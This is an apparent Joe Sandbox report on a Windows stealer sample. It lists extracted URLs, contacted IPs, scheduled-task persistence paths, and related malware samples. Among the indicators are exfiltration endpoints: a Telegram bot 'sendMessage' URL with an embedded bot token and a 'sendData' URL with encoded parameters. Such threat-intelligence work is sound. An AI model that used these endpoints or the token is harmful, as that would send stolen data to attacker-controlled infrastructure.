                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://185.217.98.121:4430LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://185.253.7.60:8080/80LpFv1haTA.exe, 00000000.00000002.2105344056.00000194599E7000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234B77000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B146F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B36F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB509F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://ac.ecosia.org/autocomplete?q=0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://116.202.101.219:80800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&u0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://46.51.231.213:4430LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                              		unknown
                                                                                                                                              http://127.0.0.1:0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://38.60.191.38:800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://167.99.138.249:8080/K7IvH_user0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-45780LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://support.mozilla.org/product0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://api.tele0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                          		unknown
                                                                                                                                                          http://206.189.109.146:800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://schemas.xmlsoap.org/wsdl/0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234D9A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1796000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B696000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB53C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://8f7482867cc6a5aec99ead5e72d7016e.serveo.net:7634//8f7482867cc6a5aec99ead5e72d7016e.serveo.net0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://45.82.65.63:800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://41.87.207.180:90900LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://api.telegram.org0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://3.12.151.253:800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown

                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public IPs

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        188.120.242.78
                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                        		29182THEFIRST-ASRUtrue
                                                                                                                                                                        185.80.128.17
                                                                                                                                                                        		unknownLithuania
                                                                                                                                                                        		61053VPSNET-ASLTfalse
                                                                                                                                                                        208.95.112.1
                                                                                                                                                                        		ip-api.comUnited States
                                                                                                                                                                        		53334TUT-ASUSfalse
                                                                                                                                                                        149.154.167.220
                                                                                                                                                                        		api.telegram.orgUnited Kingdom
                                                                                                                                                                        		62041TELEGRAMRUtrue
                                                                                                                                                                        206.189.109.146
                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                        		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                        193.149.187.135
                                                                                                                                                                        		unknownDenmark
                                                                                                                                                                        		15411DANISCODKtrue
                                                                                                                                                                        167.99.138.249
                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                        		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                        185.253.7.60
                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                        		206352MEDIACONNECTIVEGBtrue
                                                                                                                                                                        45.82.65.63
                                                                                                                                                                        		unknownUnited Kingdom
                                                                                                                                                                        		208862SIRINFO-ASITtrue
                                                                                                                                                                        138.68.79.95
                                                                                                                                                                        		serveo.netUnited States
                                                                                                                                                                        		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                                                        Private

                                                                                                                                                                        IP
                                                                                                                                                                        127.0.0.1

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1520806
                                                                                                                                                                        Start date and time:2024-09-27 23:26:11 +02:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 10m 8s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:49
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:0LpFv1haTA.exe
                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                        Original Sample Name:1bafb4856a31ae27271fbd2ee1574a4f.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@68/17@3/11
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 85%
                                                                                                                                                                        • Number of executed functions: 122
                                                                                                                                                                        • Number of non-executed functions: 3
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                        Warnings

                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                        • Execution Graph export aborted for target 0LpFv1haTA.exe, PID 5948 because it is empty
                                                                                                                                                                        • Execution Graph export aborted for target 0LpFv1haTA.exe, PID 7388 because it is empty
                                                                                                                                                                        • Execution Graph export aborted for target manager.exe, PID 2108 because it is empty
                                                                                                                                                                        • Execution Graph export aborted for target manager.exe, PID 8056 because it is empty
                                                                                                                                                                        • Execution Graph export aborted for target manager.exe, PID 8128 because it is empty
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • VT rate limit hit for: 0LpFv1haTA.exe

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        17:27:13API Interceptor6742443x Sleep call for process: 0LpFv1haTA.exe modified
                                                                                                                                                                        17:27:41API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                        17:28:32API Interceptor2706x Sleep call for process: manager.exe modified
                                                                                                                                                                        23:27:11Task SchedulerRun new task: 0LpFv1haTA path: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                        23:28:09Task SchedulerRun new task: mswindow path: C:\Users\user\AppData\Roaming\XenoManager\manager.exe

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        185.80.128.17file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                                                                                                                                        • 185.80.128.17:8080/mnemonic-verify/3E27098BCD7964327121624127/DE52CA56A9907082C17144162CC28F24
                                                                                                                                                                        208.95.112.1file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                        • ip-api.com/json/?fields=225545
                                                                                                                                                                        DHL-AWB#TRACKING907853880911.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        Ref_50102_607.7z.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        Payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                        17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                        file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                                                                                                                                        • ip-api.com/line?fields=query,country
                                                                                                                                                                        REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        DSR0987678900000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        Proof Of Payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                        149.154.167.2200225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                          .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                    Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                      VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                          TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse

                                                                                                                                                                                            Domains

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            ip-api.comfile.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            DHL-AWB#TRACKING907853880911.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Ref_50102_607.7z.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            DSR0987678900000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Proof Of Payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            api.telegram.org0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            serveo.nethttp://www.is.gd/g1mDsM/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            https://58746d458e04134ebabfbf2c1cbaf911.serveo.net/login.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            MsvL2pjs5Y.exeGet hashmaliciousAveMaria, WhiteSnake StealerBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            Services.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            https://7ebee112efb5cee2bd96ae6a79586ed0.serveo.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            https://48227f1df9cc685b88b4cfbd9e51bd84.serveo.net/login.htmlIP:Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            http://3f3a19a3465855ddd33fc11ea5dd551f.serveo.net/login.html.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            http://c9a4070e3e0ce940560dc0400f4bfea7.serveo.net/login.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 138.68.79.95
                                                                                                                                                                                            http://3db18079c799501faebad3baadb674e8.serveo.net/login.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 138.68.79.95

                                                                                                                                                                                            ASNs

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            TELEGRAMRUfile.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                            0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            THEFIRST-ASRUhttps://game-repack.site/2024/09/26/bloodborneGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 37.230.117.113
                                                                                                                                                                                            http://www.goo.su/fJu2F/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 188.120.245.54
                                                                                                                                                                                            http://vidaliaonion.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 188.120.245.54
                                                                                                                                                                                            https://u.to/W9rXIAGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 82.146.50.100
                                                                                                                                                                                            https://u.to/SpzbIAGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 82.146.50.100
                                                                                                                                                                                            http://filesharing-st2.ruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 80.87.195.79
                                                                                                                                                                                            XPC5PMKegV.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                            • 92.63.98.227
                                                                                                                                                                                            2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                            • 188.120.227.56
                                                                                                                                                                                            http://ledger-devices-sync.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 77.246.156.134
                                                                                                                                                                                            Liquidation.Loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                            • 212.109.199.34
                                                                                                                                                                                            VPSNET-ASLTfile.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                                                                                                                                                            • 185.80.128.17
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                                                                                                                                            • 91.211.247.248
